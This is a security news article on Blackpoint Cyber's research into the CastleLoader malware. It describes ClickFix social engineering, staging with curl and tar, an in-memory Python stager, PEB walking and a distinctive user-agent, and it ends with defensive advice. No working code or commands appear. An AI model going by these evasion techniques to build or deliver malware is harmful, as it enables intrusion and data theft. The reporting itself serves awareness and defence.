CastleLoader Malware Now Uses Python Loader to Bypass Security

A critical shift in cyberattack methods has been found by Blackpoint Cyber’s Adversary Pursuit Group. Their research, shared with Hackread.com, shows that CastleLoader, a malware first reported and analyzed around July and August of 2025, is getting a new, stealthier upgrade. The includes attackers now using the Python programming language to make their delivery system harder to spot.

****The Deceptive Delivery Method****

CastleLoader has traditionally been delivered using a sneaky social engineering attack called ClickFix, where attackers trick people into typing a command into the Windows Run box (by pressing the Win + R keys), typically disguised as a human verification step or a fix for a fake error.

This single command then secretly activates built-in Windows tools like curl.exe and tar to manage the initial file transfer and staging process, storing the contents in a hidden folder on the user’s computer, all without displaying any visible window or prompt.

Blackpoint’s investigation reveals that in this campaign CastleLoader’s role is simple but dangerous. It downloads an encrypted, hidden package from the attacker’s server, then runs whatever malicious program the attacker chooses on the victim’s computer.

Researchers observed that it has been used to install a broad range of malware, including remote control tools like CastleRAT or NetSupport RAT, and information-stealing programs such as Stealc, RedLine, Rhadamanthys, and MonsterV2.

****The Stealthy Python Stager****

Further probing revealed that once the files are staged, a small Python script is run using the windowless interpreter (pythonw.exe). This script runs secretly without any console window to rebuild and launch CastleLoader directly within memory, avoiding the need to write an executable file to the disk. Researchers noted that attackers used “Python bytecode, in-memory shellcode execution, and PEB Walking to bypass traditional defences.”

CastleLoader Kill Chain (Source: Blackpoint)

The PEB Walking method is a key part of the attack, allowing the malware to look for necessary system functions and resolve required APIs entirely at runtime, which helps it avoid security tools. When CastleLoader finally connects to the attacker’s server to download its final payload, it uses a unique identifying tag, a hardcoded GoogeBot User-Agent. This unusual tag is a specific clue that confirms this is a continuing attack from the CastleLoader family.

This detailed investigation points to a clear evolution in the tools used by criminals. Blackpoint security experts propose that users must be taught to avoid ClickFix social engineering, particularly any prompt asking them to use the Windows Run dialog box.

Administrators should limit or disable access to the Run dialog, cmd.exe, PowerShell, and Python programs for most users, and monitor for suspicious activity, such as Python running from unusual locations like the AppData folder.